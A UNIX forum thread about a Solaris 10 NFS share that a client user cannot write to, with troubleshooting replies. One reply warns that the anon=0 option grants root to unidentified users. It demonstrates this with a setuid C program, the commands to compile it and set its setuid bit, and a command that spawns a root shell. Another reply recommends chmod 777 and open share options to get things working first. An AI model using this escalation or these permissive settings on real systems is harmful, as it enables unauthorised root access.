Unable to write to a mounted NFS share


 
Thread Tools Search this Thread
# 1  
Old 09-12-2014
Unable to write to a mounted NFS share

Hi All,

I created a nfs share in the server(Solaris 10) with the following command and also updated the dfstab file

share -F nfs -o rw=server_name2,anon=0 /to_share

And then in the client(solaris 10) added the following command to mount the share

mount -F nfs server_name1:/to_share /shared_by


In the client ,I changed the owner of the mount directory and all the files in it to another user (oracle)
But it doesn't allow oracle to modify the file or create a new file in the dir.

Please let me know if I need to change any option.

Thanks
# 2  
Old 09-13-2014
What you've done seems to me like it should work. Nothing jumps out at me as being incorrect. It could be a permissions issue; perhaps not.

What I would do is to get it working first by opening up security if it's not too big a risk for the site, and then close things down step by step checking it still works.

Here's what I would do in your position...........

1. Are you sure that the shared directory on the server allows writing permission to that client? To be sure set the actual shared directory rights to 777. Does it work now?

2. When the server receives an in-bound connection request it only has the clients ip address. Can the server resolve that to the client name that you have given in your share command? Ensure that client (and its ip address) appears in /etc/hosts or can be resolved through DNS. If not, the server doesn't know who's who.

(On the server, if you

Code:
# ping <client name>

Do you get the correct response? Is the client name resolved to the correct ip address?)

Does it work now?

3. Try changing your share command to:

Code:
share -F nfs -o rw,root=server_name2 /to_share

to give the in-bound connection root permissions on the server. (You can also omit the anon=0, it's a "catch all" for unidentified users.)

Does it work now?

Remember that you may need to re-issue the server share, and re-issue the client NFS mount to test it.

Hope that helps.

Do please post back your progress. There's other things to try. There's loads of expertise on this forum to help you, be assured of that.

If you can take the security risk, get it working first at any cost and then tighten up afterwards. If you can't take that risk, let us know.

Last edited by hicksd8; 09-15-2014 at 04:37 PM..
This User Gave Thanks to hicksd8 For This Post:
Rossdba (09-15-2014)
# 3  
Old 09-15-2014
Hi ,

Thank you mfor your most detailed answer and it solved my problem when I used
root=server_name2
But somehow I had to use

anon=0 too without which it didn't allow the user to create any file in the dir.

Thanks again.
# 4  
Old 09-15-2014
Using "anon=0" is about as dangerous to security as you can possibly imagine.

What "anon=0" means is, "If I don't know who you are, I'm giving you root permissions in the file system." If you need to do THAT, something is badly broken in your configuration. BADLY BROKEN.

Create this file in that NFS file system on an NFS client as a user that's not recognized by the NFS server:
crack.c:
Code:
#include <unistd.h>
int main( int argc, char **argv )
{
    setuid( 0 );
    seteuid( 0 );
    setgid( 0 );
    setegid( 0 );
    execv( argv[ 1 ], argv + 1 );
}

Now run these commands:
Code:
cc crack.c -o crack
chmod 4755 crack

Then run something like this from any host mounting that file system - as any user - whether it's mounted natively or via NFS:
Code:
crack /bin/bash

Instant root shell, goodbye security.
# 5  
Old 09-15-2014
Having to use
Code:
anon=0

is telling you that
Code:
rw,root=<client name>

is not sufficient to identify the client. See note 2 in my post#2.

Did you put (previously created) files in the share directory on the server? If so, what security mask is on them? You may have set the parent share directory to 777, but what about the files below?

Yes, as I recommended you got it working "at any cost" but you now need to consider the security level you are going to run with.

As already pointed out by Achenle, using anon=0 gives root access to all unidentified users. It all depends whether you can risk that.
 

|
Thread Tools Search this Thread
Search this Thread:
Advanced Search

More UNIX and Linux Forum Topics You Might Find Helpful
Unable to search NFS Share jgt IP Networking 5 12-21-2018 03:38 PM
Unable to write to NFS mounted directory anaigini45 HP-UX 3 01-18-2018 10:47 AM
NFS write error on host xyz: Stale NFS file handle - Solaris 10 psychocandy Solaris 5 10-17-2017 06:34 AM
Mount NFS Share On NFS Client via bash script. Brian.t Shell Programming and Scripting 4 03-13-2016 11:03 AM
Unable to access NFS share on Solaris Server from Linux client SunilB2011 Red Hat 3 06-22-2012 03:01 AM
NFS mounted drive showing Write protected message rakeshkumar UNIX for Dummies Questions & Answers 0 06-14-2012 07:45 AM
Directory / File changes on CIFS share mounted on Red Hat Linux SupeAlok Shell Programming and Scripting 1 06-12-2012 05:34 PM
I/O speed to CIFS mounted Windows Share kah00na AIX 8 02-10-2012 05:32 PM
how to make nas share mounted in zones persistent across reboots? chidori Solaris 2 01-11-2012 11:02 PM
Script to copy User home folders to mounted windows share EricM Shell Programming and Scripting 7 03-30-2011 01:56 PM
NFS mounted files Harleyrci Solaris 12 10-08-2010 03:25 PM
Apache/CGI Bin Accessing mounted SMB share NDxiak Shell Programming and Scripting 1 11-24-2009 07:41 PM
NFS write error on host : Stale NFS file handle AirWalker83 Solaris 2 03-27-2008 04:42 AM
Unable to mount NFS share during boot jlslhills AIX 0 08-09-2005 03:55 PM
How can I tell if a filesystem is NFS mounted? giannicello UNIX for Dummies Questions & Answers 3 09-23-2002 03:13 PM